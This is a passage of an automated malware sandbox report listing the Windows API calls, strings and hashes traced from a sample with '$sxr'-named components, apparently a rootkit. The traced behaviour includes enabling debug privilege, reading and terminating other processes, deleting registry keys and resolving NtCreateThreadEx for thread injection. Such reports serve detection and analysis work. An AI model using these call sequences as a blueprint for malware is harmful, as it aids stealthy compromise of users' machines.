                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                                      • GetLastError.KERNEL32 ref: 004013B6
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004013C5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$OpenToken$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2574353748-2896544425
                                                                                                                      • Opcode ID: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                                      • Instruction ID: e2a5f4244efd0fdb54eb2fb8bae3e68f4838b917bcc28da7506a6e19d6301c26
                                                                                                                      • Opcode Fuzzy Hash: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                                      • Instruction Fuzzy Hash: C101CC75901619AFE7009BA49E89BAF77BCEB04745F004435BA01F22D1D7B49E44CB68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                                      • K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004011EB
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00401212
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00401219
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4084875642-0
                                                                                                                      • Opcode ID: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                                      • Instruction ID: da445f777c3a34a6d199b0584eba223951ce35d7d1b72319c39e632b78911c99
                                                                                                                      • Opcode Fuzzy Hash: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                                      • Instruction Fuzzy Hash: 8A513075D00219ABDB14DFD5CE84AAFBBB8FF0D300F10446AE645BB290D7789A41CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • #2.OLEAUT32($sxrsvc32), ref: 004013E7
                                                                                                                      • #2.OLEAUT32(00402114), ref: 004013F1
                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000), ref: 004013FA
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401414
                                                                                                                      • CoCreateInstance.OLE32(00402098,00000000,00000001,00402088,?), ref: 0040143F
                                                                                                                      • #8.OLEAUT32(?), ref: 00401451
                                                                                                                      • CoUninitialize.OLE32 ref: 004014DE
                                                                                                                      • #6.OLEAUT32(?), ref: 004014F0
                                                                                                                      • #6.OLEAUT32(00000000), ref: 004014F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize$CreateInstanceSecurityUninitialize
                                                                                                                      • String ID: $sxrsvc32
                                                                                                                      • API String ID: 374467530-78464866
                                                                                                                      • Opcode ID: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                                      • Instruction ID: 8a654483f6148525abe5e909ff2a9399e1f522979beb927b6318c92976265d17
                                                                                                                      • Opcode Fuzzy Hash: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                                      • Instruction Fuzzy Hash: 55415271E00218AFDB00DFA9CD899AF7BBDEF45354B100069F905FB1A0C6B5AD05CBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040133E: GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                                        • Part of subcall function 0040133E: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                                        • Part of subcall function 0040133E: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                                        • Part of subcall function 0040133E: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                                        • Part of subcall function 0040133E: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                                        • Part of subcall function 0040133E: GetLastError.KERNEL32 ref: 004013B6
                                                                                                                        • Part of subcall function 0040133E: CloseHandle.KERNEL32(00000000), ref: 004013C5
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                                      • RegDeleteValueW.ADVAPI32(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
Similarity
• API ID: Process$Heap$Open$TokenValue$AdjustAllocCloseCurrentDeleteErrorFreeHandleLastLookupPrivilegePrivileges
• String ID: $sxrstager$SOFTWARE
• API String ID: 2684971006-1606840681
• Opcode ID: 4c570abea0792dd94860d043fe7cf1b7caeabb8fc4f27b3d0c74d9b7923a3ab5
• Instruction ID: e2b15fd1bdb0af68db2fceded59578336af26d801dc78018de8527ed98e595ed
• Opcode Fuzzy Hash: 4c570abea0792dd94860d043fe7cf1b7caeabb8fc4f27b3d0c74d9b7923a3ab5
• Instruction Fuzzy Hash: B401A531B00310BBE7107BF59E4EB6F776D9B44705F00043AF706F62E2DAB89A418658
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040129E
• HeapAlloc.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012A5
  • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
  • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
  • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
  • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
  • Part of subcall function 00401081: K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
  • Part of subcall function 00401081: OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
  • Part of subcall function 00401081: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
  • Part of subcall function 00401081: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
  • Part of subcall function 00401081: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004011EB
  • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
  • Part of subcall function 00401081: HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
• OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012E3
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012F3
• CloseHandle.KERNEL32(000003E8,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012FC
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040130F
• HeapFree.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 00401316
Memory Dump Source
• Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
Similarity
• API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
• String ID:
• API String ID: 1323846700-0
• Opcode ID: f8e2dd12d7d8159a1779e005bd96ddce77076a082f3154ee3cacccf03337a804
• Instruction ID: ab2b09c8b71ca9c99a709ec0924a6b803fad294693bd42ca56058f473aaebc13
• Opcode Fuzzy Hash: f8e2dd12d7d8159a1779e005bd96ddce77076a082f3154ee3cacccf03337a804
• Instruction Fuzzy Hash: B601C071A00301ABEB116BE48F0DB5F77A8EB04712F144136EA05B22E1DBB88D40C768
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(?,SOFTWARE\$sxrconfig,00000000,000F013F,000003E8,?,00000000), ref: 00401022
• RegDeleteKeyW.ADVAPI32(000003E8,?,?,00000000), ref: 00401038
• RegEnumKeyExW.ADVAPI32(000003E8,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00401058
• RegCloseKey.ADVAPI32(000003E8,?,00000000), ref: 00401065
• RegDeleteKeyExW.ADVAPI32(?,SOFTWARE\$sxrconfig,000F013F,00000000,?,00000000), ref: 00401077
Strings
Memory Dump Source
• Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
Similarity
• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\$sxrconfig
• API String ID: 3013565938-435319591
• Opcode ID: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
• Instruction ID: d544ddb297f42690969b4a203d904ba38e423bc2ba9d9ccdcf6cbbeeb35745ab
• Opcode Fuzzy Hash: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
• Instruction Fuzzy Hash: CD011271500288FBD7609B92DE4DEAB7ABCEBC5741F10007AB605F10A0DB745E44DA35
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(ntdll.dll,00401271,000003E8,001FFFFF,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00401593), ref: 00401324
• GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401334
Strings
Memory Dump Source
• Source File: 00000007.00000002.1910302250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_dllhost.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: NtCreateThreadEx$ntdll.dll
• API String ID: 1646373207-690569937
• Opcode ID: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
• Instruction ID: d003ae9fd3514cd023d1297aa5e823454f89fcb9fe9eff1a1c2077655f61d9ec
• Opcode Fuzzy Hash: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
• Instruction Fuzzy Hash: 63C09270B423009AEE102B715F0DF0B3A686A40B42B1448B3B609F05E4DAFCC484D52C
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage:1%
Dynamic/Decrypted Code Coverage:88%
Signature Coverage:8.4%
Total number of Nodes:502
Total number of Limit Nodes:6
execution_graph (interactive node/edge listing not reproduced; Windows API calls appearing as graph nodes: GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, HeapFree, LoadLibraryExW, LoadLibraryW, LoadLibraryA, FreeLibrary, GetModuleHandleW, GetProcAddress, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetACP, GetOEMCP, IsValidCodePage, GetCPInfo, GetStringTypeW, LCMapStringW, Sleep, GetStartupInfoW, GetVersion, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, ExpandEnvironmentStringsA, UnregisterApplicationRestart, VirtualAlloc; CRT helpers referenced: _amsg_exit, _initterm, _IsNonwritableInCurrentImage, _ismbblead, _cexit, exit, malloc, _set_errno_from_matherr, __free_lconv_mon, _invalid_parameter_noinfo, _handle_error, __vcrt_freeptd, try_get_function, Concurrency::details::SchedulerProxy::DeleteThis)

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
• Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
Similarity
• API ID: AddressLibraryProc$CloseFreeHandleLoadModule$ApplicationByteCharEnvironmentExpandMultiOpenQueryRestartStringsUnregisterValueVersionWide
• String ID: HeapSetInformation$Kernel32.dll$RegisterApplicationRestart$RunHTMLApplication$WLDP.DLL$WldpGetLockdownPolicy$clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32$kernel32.dll
• API String ID: 964684844-3560873152
• Opcode ID: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
• Instruction ID: 7f3ef331644e1ce6af3de4bf0dc47f088633cd53e799c333f96ada96eca2d294
• Opcode Fuzzy Hash: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
• Instruction Fuzzy Hash: 92915231A04F5286EB14AF52A880179E6E1BF4BBB4BD44235DE6E437D5DF3ED4888720
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
• Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
Similarity
• API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
• String ID:
• API String ID: 2995914023-0
• Opcode ID: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
• Instruction ID: ea86fe5f0ed52ae5cc64cab38e145c3400b4e51de6f73acc22bffbbc4feaa70b
• Opcode Fuzzy Hash: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
• Instruction Fuzzy Hash: 42510D31908E4685F760AF23E8D0775A2E4FB477A4FE80435D94E86695DF3EE9C88720
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0
• Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
• Instruction ID: 3ad0317acba294e503705554d0d3cff192d72a95ef70eaf17eaae038c2faa7ab
• Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
• Instruction Fuzzy Hash: 5A219531B15F90C1E6219F12A500799F6A5F78FBD0F495236EE896BBD8EF38C4518701
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction ID: c9cf6f5040c86bcf3847dedca6d4ac5f91d63bb0bd5d9c9f60c5a2eba71b3a6f
• Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction Fuzzy Hash: 8D61233270225083EB6ACF15D6507EDB391FB4ABD4F548221EA9A07BC5DB38E896C701
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
• Instruction ID: e0b30aa0e67bf74424123e57286eb7d4fbf55c1ab2cd6a37b5abb5d6e6d20d36
• Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
• Instruction Fuzzy Hash: C7F06D74703E05C9FF5B5F629651BD9D2809B4FBC0F0A5823A90A9E3D1FF2CC4418212
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
• Instruction ID: b1310946baaa146bd96c7807db8a835eb8cf8186b8e31cd4033629dda616d4af
• Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
• Instruction Fuzzy Hash: F5D0A9B0B03C02C6FE2E9FA26A057F08240DB9F7C4F048023B80889291FB1084918242
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 0000000D.00000002.2915898669.000001A00A5B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A00A5B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00a5b0000_$sxr-mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction ID: 24b1b97687fa8c33246133a52294ce69bdb011dba7b5e7b4cbb69c904c6eacf0
• Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction Fuzzy Hash: 79900254AA640A55D41551910D4639D5040738D392FD446805416D0184D54D42D75163
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                                      • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction ID: eea6f709ce83b93bf8c931aa4dc70c80e406a7dbfba1389e0918635ceccdc5f6
                                                                                                                      • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction Fuzzy Hash: C4B17C72312E91C2EB568F26D640BE9A7A4FB4BBD4F455017FE095BB94EB35C880C341
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3140674995-0
                                                                                                                      • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction ID: 3ba8e6e439e03b5a3bc758d3b8f8069b87eaa1d419f2ede4741ca8f294e68c32
                                                                                                                      • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction Fuzzy Hash: F5317072306F81CAEB618F60E8407DDB764F78A794F44842AEA4E4BB95EF38C548C715
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction ID: c5477e2f072d014b5c46831cd8435b1e3c063a6f184e80f6aae3f12c941a2b3f
                                                                                                                      • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction Fuzzy Hash: 19317C32315F8096DB618F25E8407DEB7A4F78A7A4F504127EA8D4BB98EF38C545CB01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1443284424-0
                                                                                                                      • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction ID: f5841654a05ab3f79805421bf165e4961e83cb85bd3758965bcddfde686f1e8d
                                                                                                                      • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction Fuzzy Hash: 6BE1CE72715A81DAE702CF64D6403DEBBB1F34B7C8F148116EE4A5BB99EA34C516C701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                                      • API String ID: 3215553584-1407779936
                                                                                                                      • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                                      • Instruction ID: 3d9d3ed3b6d7a55fb82e6fc493a3f6bc75b91b6af9b0b08d1d0f39a31465a3d5
                                                                                                                      • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                                      • Instruction Fuzzy Hash: CB51CD73712A9485EF16CBA29A007DD27A1FB5BBD8F454625FE9A07FC5EB38C0818311
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                      • Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                      • Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1249254920-0
                                                                                                                      • Opcode ID: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
                                                                                                                      • Instruction ID: f192d7fb05820ef89a59105d662f75026b9b7294489770cd224426d06a5e2049
